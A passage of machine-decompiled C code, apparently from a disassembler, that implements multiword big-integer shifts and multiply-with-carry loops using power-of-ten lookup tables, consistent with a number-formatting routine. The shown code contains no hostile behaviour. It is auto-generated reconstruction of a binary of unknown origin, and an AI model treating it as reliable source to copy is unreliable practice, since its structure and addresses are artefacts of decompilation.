                															_t210 = _t1258 - 1; // 0x70
                															__eflags = _t210 - _t1061;
                															if(_t210 >= _t1061) {
                																_t1168 = 0;
                																__eflags = 0;
                															} else {
                																_t1168 =  *(_t1216 - 4);
                															}
                															_t1216 = _t1216 - 4;
                															_t972 = _v1880;
                															_t1258 = _t1258 - 1;
                															 *_t972 = _t1168 >> 0x0000001f ^ _v1876 + _v1876;
                															_v1880 = _t972 - 4;
                															__eflags = _t1258 - 0xffffffff;
                															if(_t1258 == 0xffffffff) {
                																break;
                															}
                															_t1061 = _v472;
                														}
                														_t1240 = _v1872;
                													}
                													__eflags = _v1865;
                													if(_v1865 == 0) {
                														_v472 = _t1109;
                													} else {
                														_t218 = _t1109 + 1; // 0x73
                														_v472 = _t218;
                													}
                												}
                											}
                											_t1192 = 1 - _t1240;
                											E003EFFF0(_t1192,  &_v1396, 0, 1);
                											__eflags = 1;
                											 *(_t1271 + 0xbad63d) = 1 << (_t1192 & 0x0000001f);
                											_t805 = 0xbadbae;
                										} else {
                											_v1396 = _v1396 & 0x00000000;
                											_t1110 = 2;
                											_v1392 = 0x100000;
                											_v1400 = _t1110;
                											__eflags = _t1061 - _t1110;
                											if(_t1061 == _t1110) {
                												_t1172 = 0;
                												__eflags = 0;
                												while(1) {
                													_t974 =  *((intOrPtr*)(_t1271 + _t1172 - 0x570));
                													__eflags = _t974 -  *((intOrPtr*)(_t1271 + _t1172 - 0x1d0));
                													if(_t974 !=  *((intOrPtr*)(_t1271 + _t1172 - 0x1d0))) {
                														goto L101;
                													}
                													_t1172 = _t1172 + 4;
                													__eflags = _t1172 - 8;
                													if(_t1172 != 8) {
                														continue;
                													} else {
                														_t166 =  &_v1896;
                														 *_t166 = _v1896 & 0x00000000;
                														__eflags =  *_t166;
                														asm("bsr eax, edi");
                														if( *_t166 == 0) {
                															_t1173 = 0;
                															__eflags = 0;
                														} else {
                															_t1173 = _t974 + 1;
                														}
                														_t975 = 0x20;
                														_t1259 = _t1110;
                														__eflags = _t975 - _t1173 - _t1110;
                														_t977 =  &_v460;
                														_v1880 = _t977;
                														_t1217 = _t977;
                														_t171 =  &_v1865;
                														 *_t171 = _t975 - _t1173 - _t1110 > 0;
                														__eflags =  *_t171;
                														while(1) {
                															__eflags = _t1259 - _t1061;
                															if(_t1259 >= _t1061) {
                																_t173 =  &_v1876;
                																 *_t173 = _v1876 & 0x00000000;
                																__eflags =  *_t173;
                															} else {
                																_v1876 =  *_t1217;
                															}
                															_t175 = _t1259 - 1; // 0x0
                															__eflags = _t175 - _t1061;
                															if(_t175 >= _t1061) {
                																_t1174 = 0;
                																__eflags = 0;
                															} else {
                																_t1174 =  *(_t1217 - 4);
                															}
                															_t1217 = _t1217 - 4;
                															_t981 = _v1880;
                															_t1259 = _t1259 - 1;
                															 *_t981 = _t1174 >> 0x0000001e ^ _v1876 << 0x00000002;
                															_v1880 = _t981 - 4;
                															__eflags = _t1259 - 0xffffffff;
                															if(_t1259 == 0xffffffff) {
                																break;
                															}
                															_t1061 = _v472;
                														}
                														__eflags = _v1865;
                														_t1111 = _t1110 - _v1872;
                														_v472 = (0 | _v1865 != 0x00000000) + _t1110;
                														_t1219 = _t1111 >> 5;
                														_v1884 = _t1111;
                														_t1261 = _t1219 << 2;
                														E003EFFF0(_t1219,  &_v1396, 0, _t1261);
                														 *(_t1271 + _t1261 - 0x570) = 1 << (_v1884 & 0x0000001f);
                														_t805 = _t1219 + 1;
                													}
                													goto L128;
                												}
                											}
                											goto L101;
                										}
                										L128:
                										_v1400 = _t805;
                										_t1064 = 0x1cc;
                										_v936 = _t805;
                										__eflags = _t805 << 2;
                										E003FBDE1( &_v932, 0x1cc,  &_v1396, _t805 << 2);
                										_t1277 =  &(_t1274[7]);
                									} else {
                										_v1396 = _v1396 & 0x00000000;
                										_t1262 = 2;
                										_v1392 = 0x100000;
                										_v1400 = _t1262;
                										__eflags = _t1061 - _t1262;
                										if(_t1061 != _t1262) {
                											L53:
                											_t992 = _v1872 + 1;
                											_t993 = _t992 & 0x0000001f;
                											_t1114 = 0x20;
                											_v1876 = _t993;
                											_t1221 = _t992 >> 5;
                											_v1872 = _t1221;
                											_v1908 = _t1114 - _t993;
                											_t996 = E003EF0C0(1, _t1114 - _t993, 0);
                											_t1116 =  *((intOrPtr*)(_t1271 + _t1061 * 4 - 0x1d4));
                											_t997 = _t996 - 1;
                											_t108 =  &_v1896;
                											 *_t108 = _v1896 & 0x00000000;
                											__eflags =  *_t108;
                											asm("bsr ecx, ecx");
                											_v1884 = _t997;
                											_v1912 =  !_t997;
                											if( *_t108 == 0) {
                												_t1117 = 0;
                												__eflags = 0;
                											} else {
                												_t1117 = _t1116 + 1;
                											}
                											_t999 = 0x20;
                											_t1000 = _t999 - _t1117;
                											_t1179 = _t1061 + _t1221;
                											__eflags = _v1876 - _t1000;
                											_v1892 = _t1179;
                											_t1001 = _t1000 & 0xffffff00 | _v1876 - _t1000 > 0x00000000;
                											__eflags = _t1179 - 0x73;
                											_v1865 = _t1001;
                											_t1118 = _t1117 & 0xffffff00 | _t1179 - 0x00000073 > 0x00000000;
                											__eflags = _t1179 - 0x73;
                											if(_t1179 != 0x73) {
                												L59:
                												_t1002 = 0;
                												__eflags = 0;
                											} else {
                												__eflags = _t1001;
                												if(_t1001 == 0) {
                													goto L59;
                												} else {
                													_t1002 = 1;
                												}
                											}
                											__eflags = _t1118;
                											if(_t1118 != 0) {
                												L81:
                												__eflags = 0;
                												_t1064 = 0x1cc;
                												_v1400 = 0;
                												_v472 = 0;
                												E003FBDE1( &_v468, 0x1cc,  &_v1396, 0);
                												_t1274 =  &(_t1274[4]);
                											} else {
                												__eflags = _t1002;
                												if(_t1002 != 0) {
                													goto L81;
                												} else {
                													_t1119 = 0x72;
                													__eflags = _t1179 - _t1119;
                													if(_t1179 >= _t1119) {
                														_t1179 = _t1119;
                														_v1892 = _t1119;
                													}
                													_t1012 = _t1179;
                													_v1880 = _t1012;
                													__eflags = _t1179 - 0xffffffff;
                													if(_t1179 != 0xffffffff) {
                														_t1180 = _v1872;
                														_t1264 = _t1179 - _t1180;
                														__eflags = _t1264;
                														_t1123 =  &_v468 + _t1264 * 4;
                														_v1888 = _t1123;
                														while(1) {
                															__eflags = _t1012 - _t1180;
                															if(_t1012 < _t1180) {
                																break;
                															}
                															__eflags = _t1264 - _t1061;
                															if(_t1264 >= _t1061) {
                																_t1224 = 0;
                																__eflags = 0;
                															} else {
                																_t1224 =  *_t1123;
                															}
                															__eflags = _t1264 - 1 - _t1061;
                															if(_t1264 - 1 >= _t1061) {
                																_t1017 = 0;
                																__eflags = 0;
                															} else {
                																_t1017 =  *(_t1123 - 4);
                															}
                															_t1020 = _v1880;
                															_t1123 = _v1888 - 4;
                															_v1888 = _t1123;
                															 *(_t1271 + _t1020 * 4 - 0x1d0) = (_t1224 & _v1884) << _v1876 | (_t1017 & _v1912) >> _v1908;
                															_t1012 = _t1020 - 1;
                															_t1264 = _t1264 - 1;
                															_v1880 = _t1012;
                															__eflags = _t1012 - 0xffffffff;
                															if(_t1012 != 0xffffffff) {
                																_t1061 = _v472;
                																continue;
                															}
                															break;
                														}
                														_t1179 = _v1892;
                														_t1221 = _v1872;
                														_t1262 = 2;
                													}
                													__eflags = _t1221;
                													if(_t1221 != 0) {
                														__eflags = 0;
                														memset( &_v468, 0, _t1221 << 2);
                														_t1274 =  &(_t1274[3]);
                													}
                													__eflags = _v1865;
                													_t1064 = 0x1cc;
                													if(_v1865 == 0) {
                														_v472 = _t1179;
                													} else {
                														_v472 = _t1179 + 1;
                													}
                												}
                											}
                											_v1392 = _v1392 & 0x00000000;
                											_v1396 = _t1262;
                											_v1400 = 1;
                											_v936 = 1;
                											_push(4);
                										} else {
                											_t1127 = 0;
                											__eflags = 0;
                											while(1) {
                												__eflags =  *((intOrPtr*)(_t1271 + _t1127 - 0x570)) -  *((intOrPtr*)(_t1271 + _t1127 - 0x1d0));
                												if( *((intOrPtr*)(_t1271 + _t1127 - 0x570)) !=  *((intOrPtr*)(_t1271 + _t1127 - 0x1d0))) {
                													goto L53;
                												}
                												_t1127 = _t1127 + 4;
                												__eflags = _t1127 - 8;
                												if(_t1127 != 8) {
                													continue;
                												} else {
                													_t1023 = _v1872 + 2;
                													_t1024 = _t1023 & 0x0000001f;
                													_t1128 = 0x20;
                													_t1129 = _t1128 - _t1024;
                													_v1888 = _t1024;
                													_t1266 = _t1023 >> 5;
                													_v1876 = _t1266;
                													_v1908 = _t1129;
                													_t1027 = E003EF0C0(1, _t1129, 0);
                													_v1896 = _v1896 & 0x00000000;
                													_t1028 = _t1027 - 1;
                													__eflags = _t1028;
                													asm("bsr ecx, edi");
                													_v1884 = _t1028;
                													_v1912 =  !_t1028;
                													if(_t1028 == 0) {
                														_t1130 = 0;
                														__eflags = 0;
                													} else {
                														_t1130 = _t1129 + 1;
                													}
                													_t1030 = 0x20;
                													_t1031 = _t1030 - _t1130;
                													_t1182 = _t1266 + 2;
                													__eflags = _v1888 - _t1031;
                													_v1880 = _t1182;
                													_t1032 = _t1031 & 0xffffff00 | _v1888 - _t1031 > 0x00000000;
                													__eflags = _t1182 - 0x73;
                													_v1865 = _t1032;
                													_t1131 = _t1130 & 0xffffff00 | _t1182 - 0x00000073 > 0x00000000;
                													__eflags = _t1182 - 0x73;
                													if(_t1182 != 0x73) {
                														L28:
                														_t1033 = 0;
                														__eflags = 0;
                													} else {
                														__eflags = _t1032;
                														if(_t1032 == 0) {
                															goto L28;
                														} else {
                															_t1033 = 1;
                														}
                													}
                													__eflags = _t1131;
                													if(_t1131 != 0) {
                														L50:
                														__eflags = 0;
                														_t1064 = 0x1cc;
                														_v1400 = 0;
                														_v472 = 0;
                														E003FBDE1( &_v468, 0x1cc,  &_v1396, 0);
                														_t1274 =  &(_t1274[4]);
                													} else {
                														__eflags = _t1033;
                														if(_t1033 != 0) {
                															goto L50;
                														} else {
                															_t1134 = 0x72;
                															__eflags = _t1182 - _t1134;
                															if(_t1182 >= _t1134) {
                																_t1182 = _t1134;
                																_v1880 = _t1134;
                															}
                															_t1135 = _t1182;
                															_v1892 = _t1135;
                															__eflags = _t1182 - 0xffffffff;
                															if(_t1182 != 0xffffffff) {
                																_t1183 = _v1876;
                																_t1268 = _t1182 - _t1183;
                																__eflags = _t1268;
                																_t1043 =  &_v468 + _t1268 * 4;
                																_v1872 = _t1043;
                																while(1) {
                																	__eflags = _t1135 - _t1183;
                																	if(_t1135 < _t1183) {
                																		break;
                																	}
                																	__eflags = _t1268 - _t1061;
                																	if(_t1268 >= _t1061) {
                																		_t1230 = 0;
                																		__eflags = 0;
                																	} else {
                																		_t1230 =  *_t1043;
                																	}
                																	__eflags = _t1268 - 1 - _t1061;
                																	if(_t1268 - 1 >= _t1061) {
                																		_t1045 = 0;
                																		__eflags = 0;
                																	} else {
                																		_t1045 =  *(_v1872 - 4);
                																	}
                																	_t1140 = _v1892;
                																	 *(_t1271 + _t1140 * 4 - 0x1d0) = (_t1045 & _v1912) >> _v1908 | (_t1230 & _v1884) << _v1888;
                																	_t1135 = _t1140 - 1;
                																	_t1268 = _t1268 - 1;
                																	_t1043 = _v1872 - 4;
                																	_v1892 = _t1135;
                																	_v1872 = _t1043;
                																	__eflags = _t1135 - 0xffffffff;
                																	if(_t1135 != 0xffffffff) {
                																		_t1061 = _v472;
                																		continue;
                																	}
                																	break;
                																}
                																_t1182 = _v1880;
                																_t1266 = _v1876;
                															}
                															__eflags = _t1266;
                															if(_t1266 != 0) {
                																__eflags = 0;
                																memset( &_v468, 0, _t1266 << 2);
                																_t1274 =  &(_t1274[3]);
                															}
                															__eflags = _v1865;
                															_t1064 = 0x1cc;
                															if(_v1865 == 0) {
                																_v472 = _t1182;
                															} else {
                																_v472 = _t1182 + 1;
                															}
                														}
                													}
                													_v1392 = _v1392 & 0x00000000;
                													_t1038 = 4;
                													__eflags = 1;
                													_v1396 = _t1038;
                													_v1400 = 1;
                													_v936 = 1;
                													_push(_t1038);
                												}
                												goto L52;
                											}
                											goto L53;
                										}
                										L52:
                										_push( &_v1396);
                										_push(_t1064);
                										_push( &_v932);
                										E003FBDE1();
                										_t1277 =  &(_t1274[4]);
                									}
                									_t810 = _v1904;
                									_t1084 = 0xa;
                									_v1912 = _t1084;
                									__eflags = _t810;
                									if(_t810 < 0) {
                										_t811 =  ~_t810;
                										_t812 = _t811 / _t1084;
                										_v1880 = _t812;
                										_t1085 = _t811 % _t1084;
                										_v1884 = _t1085;
                										__eflags = _t812;
                										if(_t812 == 0) {
                											L249:
                											__eflags = _t1085;
                											if(_t1085 != 0) {
                												_t849 =  *(0x4083dc + _t1085 * 4);
                												_v1896 = _t849;
                												__eflags = _t849;
                												if(_t849 == 0) {
                													L260:
                													__eflags = 0;
                													_push(0);
                													_v472 = 0;
                													_v2408 = 0;
                													goto L261;
                												} else {
                													__eflags = _t849 - 1;
                													if(_t849 != 1) {
                														_t1096 = _v472;
                														__eflags = _t1096;
                														if(_t1096 != 0) {
                															_t1199 = 0;
                															_t1248 = 0;
                															__eflags = 0;
                															do {
                																_t1153 = _t849 *  *(_t1271 + _t1248 * 4 - 0x1d0) >> 0x20;
                																 *(_t1271 + _t1248 * 4 - 0x1d0) = _t849 *  *(_t1271 + _t1248 * 4 - 0x1d0) + _t1199;
                																_t849 = _v1896;
                																asm("adc edx, 0x0");
                																_t1248 = _t1248 + 1;
                																_t1199 = _t1153;
                																__eflags = _t1248 - _t1096;
                															} while (_t1248 != _t1096);
                															__eflags = _t1199;
                															if(_t1199 != 0) {
                																_t856 = _v472;
                																__eflags = _t856 - 0x73;
                																if(_t856 >= 0x73) {
                																	goto L260;
                																} else {
                																	 *(_t1271 + _t856 * 4 - 0x1d0) = _t1199;
                																	_v472 = _v472 + 1;
                																}
                															}
                														}
                													}
                												}
                											}
                										} else {
                											do {
                												__eflags = _t812 - 0x26;
                												if(_t812 > 0x26) {
                													_t812 = 0x26;
                												}
                												_t1097 =  *(0x408346 + _t812 * 4) & 0x000000ff;
                												_v1872 = _t812;
                												_v1400 = ( *(0x408346 + _t812 * 4) & 0x000000ff) + ( *(0x408347 + _t812 * 4) & 0x000000ff);
                												E003EFFF0(_t1097 << 2,  &_v1396, 0, _t1097 << 2);
                												_t867 = E003F0320( &(( &_v1396)[_t1097]), 0x407a40 + ( *(0x408344 + _v1872 * 4) & 0x0000ffff) * 4, ( *(0x408347 + _t812 * 4) & 0x000000ff) << 2);
                												_t1098 = _v1400;
                												_t1277 =  &(_t1277[6]);
                												_v1892 = _t1098;
                												__eflags = _t1098 - 1;
                												if(_t1098 > 1) {
                													__eflags = _v472 - 1;
                													if(_v472 > 1) {
                														__eflags = _t1098 - _v472;
                														_t1202 =  &_v1396;
                														_t868 = _t867 & 0xffffff00 | _t1098 - _v472 > 0x00000000;
                														__eflags = _t868;
                														if(_t868 != 0) {
                															_t1154 =  &_v468;
                														} else {
                															_t1202 =  &_v468;
                															_t1154 =  &_v1396;
                														}
                														_v1908 = _t1154;
                														__eflags = _t868;
                														if(_t868 == 0) {
                															_t1098 = _v472;
                														}
                														_v1876 = _t1098;
                														__eflags = _t868;
                														if(_t868 != 0) {
                															_v1892 = _v472;
                														}
                														_t1155 = 0;
                														_t1250 = 0;
                														_v1864 = 0;
                														__eflags = _t1098;
                														if(_t1098 == 0) {
                															L243:
                															_v472 = _t1155;
                															_t870 = _t1155 << 2;
                															__eflags = _t870;
                															_push(_t870);
                															_t871 =  &_v1860;
                															goto L244;
                														} else {
                															_t1203 = _t1202 -  &_v1860;
                															__eflags = _t1203;
                															_v1928 = _t1203;
                															do {
                																_t878 =  *(_t1271 + _t1203 + _t1250 * 4 - 0x740);
                																_v1896 = _t878;
                																__eflags = _t878;
                																if(_t878 != 0) {
                																	_t879 = 0;
                																	_t1204 = 0;
                																	_t1099 = _t1250;
                																	_v1888 = 0;
                																	__eflags = _v1892;
                																	if(_v1892 == 0) {
                																		L240:
                																		__eflags = _t1099 - 0x73;
                																		if(_t1099 == 0x73) {
                																			goto L258;
                																		} else {
                																			_t1203 = _v1928;
                																			_t1098 = _v1876;
                																			goto L242;
                																		}
                																	} else {
                																		while(1) {
                																			__eflags = _t1099 - 0x73;
                																			if(_t1099 == 0x73) {
                																				goto L235;
                																			}
                																			__eflags = _t1099 - _t1155;
                																			if(_t1099 == _t1155) {
                																				 *(_t1271 + _t1099 * 4 - 0x740) =  *(_t1271 + _t1099 * 4 - 0x740) & 0x00000000;
                																				_t891 = _t879 + 1 + _t1250;
                																				__eflags = _t891;
                																				_v1864 = _t891;
                																				_t879 = _v1888;
                																			}
                																			_t886 =  *(_v1908 + _t879 * 4);
                																			asm("adc edx, 0x0");
                																			 *(_t1271 + _t1099 * 4 - 0x740) =  *(_t1271 + _t1099 * 4 - 0x740) + _t886 * _v1896 + _t1204;
                																			asm("adc edx, 0x0");
                																			_t879 = _v1888 + 1;
                																			_t1099 = _t1099 + 1;
                																			_v1888 = _t879;
                																			_t1204 = _t886 * _v1896 >> 0x20;
                																			_t1155 = _v1864;
                																			__eflags = _t879 - _v1892;
                																			if(_t879 != _v1892) {
                																				continue;
                																			} else {
                																				goto L235;
                																			}
                																			while(1) {
                																				L235:
                																				__eflags = _t1204;
                																				if(_t1204 == 0) {
                																					goto L240;
                																				}
                																				__eflags = _t1099 - 0x73;
                																				if(_t1099 == 0x73) {
                																					goto L258;
                																				} else {
                																					__eflags = _t1099 - _t1155;
                																					if(_t1099 == _t1155) {
                																						_t558 = _t1271 + _t1099 * 4 - 0x740;
                																						 *_t558 =  *(_t1271 + _t1099 * 4 - 0x740) & 0x00000000;
                																						__eflags =  *_t558;
                																						_t564 = _t1099 + 1; // 0x1
                																						_v1864 = _t564;
                																					}
                																					_t884 = _t1204;
                																					_t1204 = 0;
                																					 *(_t1271 + _t1099 * 4 - 0x740) =  *(_t1271 + _t1099 * 4 - 0x740) + _t884;
                																					_t1155 = _v1864;
                																					asm("adc edi, edi");
                																					_t1099 = _t1099 + 1;
                																					continue;
                																				}
                																				goto L246;
                																			}
                																			goto L240;
                																		}
                																		goto L235;
                																	}
                																} else {
                																	__eflags = _t1250 - _t1155;
                																	if(_t1250 == _t1155) {
                																		 *(_t1271 + _t1250 * 4 - 0x740) =  *(_t1271 + _t1250 * 4 - 0x740) & _t878;
                																		_t526 = _t1250 + 1; // 0x1
                																		_t1155 = _t526;
                																		_v1864 = _t1155;
                																	}
                																	goto L242;
                																}
                																goto L246;
                																L242:
                																_t1250 = _t1250 + 1;
                																__eflags = _t1250 - _t1098;
                															} while (_t1250 != _t1098);
                															goto L243;
                														}
                													} else {
                														_t1205 = _v468;
                														_v472 = _t1098;
                														E003FBDE1( &_v468, _t1064,  &_v1396, _t1098 << 2);
                														_t1277 =  &(_t1277[4]);
                														__eflags = _t1205;
                														if(_t1205 == 0) {
                															goto L203;
                														} else {
                															__eflags = _t1205 - 1;
                															if(_t1205 == 1) {
                																goto L245;
                															} else {
                																__eflags = _v472;
                																if(_v472 == 0) {
                																	goto L245;
                																} else {
                																	_t1100 = 0;
                																	_v1896 = _v472;
                																	_t1251 = 0;
                																	__eflags = 0;
                																	do {
                																		_t900 = _t1205;
                																		_t1156 = _t900 *  *(_t1271 + _t1251 * 4 - 0x1d0) >> 0x20;
                																		 *(_t1271 + _t1251 * 4 - 0x1d0) = _t900 *  *(_t1271 + _t1251 * 4 - 0x1d0) + _t1100;
                																		asm("adc edx, 0x0");
                																		_t1251 = _t1251 + 1;
                																		_t1100 = _t1156;
                																		__eflags = _t1251 - _v1896;
                																	} while (_t1251 != _v1896);
                																	goto L208;
                																}
                															}
                														}
                													}
                												} else {
                													_t1206 = _v1396;
                													__eflags = _t1206;
                													if(_t1206 != 0) {
                														__eflags = _t1206 - 1;
                														if(_t1206 == 1) {
                															goto L245;
                														} else {
                															__eflags = _v472;
                															if(_v472 == 0) {
                																goto L245;
                															} else {
                																_t1101 = 0;
                																_v1896 = _v472;
                																_t1252 = 0;
                																__eflags = 0;
                																do {
                																	_t905 = _t1206;
                																	_t1157 = _t905 *  *(_t1271 + _t1252 * 4 - 0x1d0) >> 0x20;
                																	 *(_t1271 + _t1252 * 4 - 0x1d0) = _t905 *  *(_t1271 + _t1252 * 4 - 0x1d0) + _t1101;
                																	asm("adc edx, 0x0");
                																	_t1252 = _t1252 + 1;
                																	_t1101 = _t1157;
                																	__eflags = _t1252 - _v1896;
                																} while (_t1252 != _v1896);
                																L208:
                																__eflags = _t1100;
                																if(_t1100 == 0) {
                																	goto L245;
                																} else {
                																	_t903 = _v472;
                																	__eflags = _t903 - 0x73;
                																	if(_t903 >= 0x73) {
                																		L258:
                																		_v2408 = 0;
                																		_v472 = 0;
                																		E003FBDE1( &_v468, _t1064,  &_v2404, 0);
                																		_t1277 =  &(_t1277[4]);
                																		_t874 = 0;
                																	} else {
                																		 *(_t1271 + _t903 * 4 - 0x1d0) = _t1100;
                																		_v472 = _v472 + 1;
                																		goto L245;
                																	}
                																}
                															}
                														}
                													} else {
                														L203:
                														_v2408 = 0;
                														_v472 = 0;
                														_push(0);
                														_t871 =  &_v2404;
                														L244:
                														_push(_t871);
                														_push(_t1064);
                														_push( &_v468);
                														E003FBDE1();
                														_t1277 =  &(_t1277[4]);
                														L245:
                														_t874 = 1;
                													}
                												}
                												L246:
                												__eflags = _t874;
                												if(_t874 == 0) {
                													_v2408 = _v2408 & 0x00000000;
                													_v472 = _v472 & 0x00000000;
                													_push(0);
                													L261:
                													_push( &_v2404);
                													_t852 =  &_v468;
                													goto L262;
                												} else {
                													goto L247;
                												}
                												goto L263;
                												L247:
                												_t812 = _v1880 - _v1872;
                												__eflags = _t812;
                												_v1880 = _t812;
                											} while (_t812 != 0);
                											_t1085 = _v1884;
                											goto L249;
                										}
                									} else {
                										_t908 = _t810 / _t1084;
                										_v1908 = _t908;
                										_t1102 = _t810 % _t1084;
                										_v1896 = _t1102;
                										__eflags = _t908;
                										if(_t908 == 0) {
                											L184:
                											__eflags = _t1102;
                											if(_t1102 != 0) {
                												_t1207 =  *(0x4083dc + _t1102 * 4);
                												__eflags = _t1207;
                												if(_t1207 != 0) {
                													__eflags = _t1207 - 1;
                													if(_t1207 != 1) {
                														_t909 = _v936;
                														_v1896 = _t909;
                														__eflags = _t909;
                														if(_t909 != 0) {
                															_t1253 = 0;
                															_t1103 = 0;
                															__eflags = 0;
                															do {
                																_t910 = _t1207;
                																_t1161 = _t910 *  *(_t1271 + _t1103 * 4 - 0x3a0) >> 0x20;
                																 *(_t1271 + _t1103 * 4 - 0x3a0) = _t910 *  *(_t1271 + _t1103 * 4 - 0x3a0) + _t1253;
                																asm("adc edx, 0x0");
                																_t1103 = _t1103 + 1;
                																_t1253 = _t1161;
                																__eflags = _t1103 - _v1896;
                															} while (_t1103 != _v1896);
                															__eflags = _t1253;
                															if(_t1253 != 0) {
                																_t913 = _v936;
                																__eflags = _t913 - 0x73;
                																if(_t913 >= 0x73) {
                																	goto L186;
                																} else {
                																	 *(_t1271 + _t913 * 4 - 0x3a0) = _t1253;
                																	_v936 = _v936 + 1;
                																}
                															}
                														}
                													}
                												} else {
                													L186:
                													_v2408 = 0;
                													_v936 = 0;
                													_push(0);
                													goto L190;
                												}
                											}
                										} else {
                											do {
                												__eflags = _t908 - 0x26;
                												if(_t908 > 0x26) {
                													_t908 = 0x26;
                												}
                												_t1104 =  *(0x408346 + _t908 * 4) & 0x000000ff;
                												_v1888 = _t908;
                												_v1400 = ( *(0x408346 + _t908 * 4) & 0x000000ff) + ( *(0x408347 + _t908 * 4) & 0x000000ff);
                												E003EFFF0(_t1104 << 2,  &_v1396, 0, _t1104 << 2);
                												_t926 = E003F0320( &(( &_v1396)[_t1104]), 0x407a40 + ( *(0x408344 + _v1888 * 4) & 0x0000ffff) * 4, ( *(0x408347 + _t908 * 4) & 0x000000ff) << 2);
                												_t1105 = _v1400;
                												_t1277 =  &(_t1277[6]);
                												_v1892 = _t1105;
                												__eflags = _t1105 - 1;
                												if(_t1105 > 1) {
                													__eflags = _v936 - 1;
                													if(_v936 > 1) {
                														__eflags = _t1105 - _v936;
                														_t1210 =  &_v1396;
                														_t927 = _t926 & 0xffffff00 | _t1105 - _v936 > 0x00000000;
                														__eflags = _t927;
                														if(_t927 != 0) {
                															_t1162 =  &_v932;
                														} else {
                															_t1210 =  &_v932;
                															_t1162 =  &_v1396;
                														}
                														_v1876 = _t1162;
                														__eflags = _t927;
                														if(_t927 == 0) {
                															_t1105 = _v936;
                														}
                														_v1880 = _t1105;
                														__eflags = _t927;
                														if(_t927 != 0) {
                															_v1892 = _v936;
                														}
                														_t1163 = 0;
                														_t1255 = 0;
                														_v1864 = 0;
                														__eflags = _t1105;
                														if(_t1105 == 0) {
                															L177:
                															_v936 = _t1163;
                															_t929 = _t1163 << 2;
                															__eflags = _t929;
                															goto L178;
                														} else {
                															_t1211 = _t1210 -  &_v1860;
                															__eflags = _t1211;
                															_v1928 = _t1211;
                															do {
                																_t937 =  *(_t1271 + _t1211 + _t1255 * 4 - 0x740);
                																_v1884 = _t937;
                																__eflags = _t937;
                																if(_t937 != 0) {
                																	_t938 = 0;
                																	_t1212 = 0;
                																	_t1106 = _t1255;
                																	_v1872 = 0;
                																	__eflags = _v1892;
                																	if(_v1892 == 0) {
                																		L174:
                																		__eflags = _t1106 - 0x73;
                																		if(_t1106 == 0x73) {
                																			goto L187;
                																		} else {
                																			_t1211 = _v1928;
                																			_t1105 = _v1880;
                																			goto L176;
                																		}
                																	} else {
                																		while(1) {
                																			__eflags = _t1106 - 0x73;
                																			if(_t1106 == 0x73) {
                																				goto L169;
                																			}
                																			__eflags = _t1106 - _t1163;
                																			if(_t1106 == _t1163) {
                																				 *(_t1271 + _t1106 * 4 - 0x740) =  *(_t1271 + _t1106 * 4 - 0x740) & 0x00000000;
                																				_t950 = _t938 + 1 + _t1255;
                																				__eflags = _t950;
                																				_v1864 = _t950;
                																				_t938 = _v1872;
                																			}
                																			_t945 =  *(_v1876 + _t938 * 4);
                																			asm("adc edx, 0x0");
                																			 *(_t1271 + _t1106 * 4 - 0x740) =  *(_t1271 + _t1106 * 4 - 0x740) + _t945 * _v1884 + _t1212;
                																			asm("adc edx, 0x0");
                																			_t938 = _v1872 + 1;
                																			_t1106 = _t1106 + 1;
                																			_v1872 = _t938;
                																			_t1212 = _t945 * _v1884 >> 0x20;
                																			_t1163 = _v1864;
                																			__eflags = _t938 - _v1892;
                																			if(_t938 != _v1892) {
                																				continue;
                																			} else {
                																				goto L169;
                																			}
                																			while(1) {
                																				L169:
                																				__eflags = _t1212;
                																				if(_t1212 == 0) {
                																					goto L174;
                																				}
                																				__eflags = _t1106 - 0x73;
                																				if(_t1106 == 0x73) {
                																					L187:
                																					__eflags = 0;
                																					_v2408 = 0;
                																					_v936 = 0;
                																					_push(0);
                																					_t940 =  &_v2404;
                																					goto L188;
                																				} else {
                																					__eflags = _t1106 - _t1163;
                																					if(_t1106 == _t1163) {
                																						_t370 = _t1271 + _t1106 * 4 - 0x740;
                																						 *_t370 =  *(_t1271 + _t1106 * 4 - 0x740) & 0x00000000;
                																						__eflags =  *_t370;
                																						_t376 = _t1106 + 1; // 0x1
                																						_v1864 = _t376;
                																					}
                																					_t943 = _t1212;
                																					_t1212 = 0;
                																					 *(_t1271 + _t1106 * 4 - 0x740) =  *(_t1271 + _t1106 * 4 - 0x740) + _t943;
                																					_t1163 = _v1864;
                																					asm("adc edi, edi");
                																					_t1106 = _t1106 + 1;
                																					continue;
                																				}
                																				goto L181;
                																			}
                																			goto L174;
                																		}
                																		goto L169;
                																	}
                																} else {
                																	__eflags = _t1255 - _t1163;
                																	if(_t1255 == _t1163) {
                																		 *(_t1271 + _t1255 * 4 - 0x740) =  *(_t1271 + _t1255 * 4 - 0x740) & _t937;
                																		_t338 = _t1255 + 1; // 0x1
                																		_t1163 = _t338;
                																		_v1864 = _t1163;
                																	}
                																	goto L176;
                																}
                																goto L181;
                																L176:
                																_t1255 = _t1255 + 1;
                																__eflags = _t1255 - _t1105;
                															} while (_t1255 != _t1105);
                															goto L177;
                														}
                													} else {
                														_t1213 = _v932;
                														_v936 = _t1105;
                														E003FBDE1( &_v932, _t1064,  &_v1396, _t1105 << 2);
                														_t1277 =  &(_t1277[4]);
                														__eflags = _t1213;
                														if(_t1213 != 0) {
                															__eflags = _t1213 - 1;
                															if(_t1213 == 1) {
                																goto L180;
                															} else {
                																__eflags = _v936;
                																if(_v936 == 0) {
                																	goto L180;
                																} else {
                																	_t1107 = 0;
                																	_v1884 = _v936;
                																	_t1256 = 0;
                																	__eflags = 0;
                																	do {
                																		_t958 = _t1213;
                																		_t1164 = _t958 *  *(_t1271 + _t1256 * 4 - 0x3a0) >> 0x20;
                																		 *(_t1271 + _t1256 * 4 - 0x3a0) = _t958 *  *(_t1271 + _t1256 * 4 - 0x3a0) + _t1107;
                																		asm("adc edx, 0x0");
                																		_t1256 = _t1256 + 1;
                																		_t1107 = _t1164;
                																		__eflags = _t1256 - _v1884;
                																	} while (_t1256 != _v1884);
                																	goto L149;
                																}
                															}
                														} else {
                															_v1400 = 0;
                															_v936 = 0;
                															_push(0);
                															_t930 =  &_v1396;
                															goto L179;
                														}
                													}
                												} else {
                													_t1214 = _v1396;
                													__eflags = _t1214;
                													if(_t1214 != 0) {
                														__eflags = _t1214 - 1;
                														if(_t1214 == 1) {
                															goto L180;
                														} else {
                															__eflags = _v936;
                															if(_v936 == 0) {
                																goto L180;
                															} else {
                																_t1108 = 0;
                																_v1884 = _v936;
                																_t1257 = 0;
                																__eflags = 0;
                																do {
                																	_t965 = _t1214;
                																	_t1165 = _t965 *  *(_t1271 + _t1257 * 4 - 0x3a0) >> 0x20;
